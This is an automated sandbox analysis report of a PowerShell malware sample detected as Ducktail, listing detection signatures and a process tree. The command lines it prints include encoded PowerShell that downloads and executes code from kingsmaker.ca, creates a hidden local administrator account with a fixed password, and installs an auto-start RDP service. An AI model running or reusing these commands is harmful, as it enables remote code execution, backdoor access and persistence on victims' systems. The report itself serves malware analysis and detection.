Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kingsmaker_6.ca.ps1

Overview

General Information

Sample name:kingsmaker_6.ca.ps1
Analysis ID:1565058
MD5:5705390f445a1b38b4c19461d81a9237
SHA1:fa9112a883c4fc8e4eb0b425e2c7462c6fee3877
SHA256:2a5101990c3fbe7274c5bf8bd72ba0f2c1d839eac121858602843f7702728015
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64native
  • powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • csc.exe (PID: 6124 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 6280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • AcroRd32.exe (PID: 8264 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf" MD5: 0F4FB7ADA3C27236864D008A1687AD8D)
        • RdrCEF.exe (PID: 8548 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
          • RdrCEF.exe (PID: 8724 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
    • cmd.exe (PID: 7160 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5936 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svczHost.exe (PID: 9708 cmdline: C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 9716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9776 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 9840 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 9928 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 9848 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 10032 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 10040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7776 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 5560 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 9484 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 3364 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1540 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 2744 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1368 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
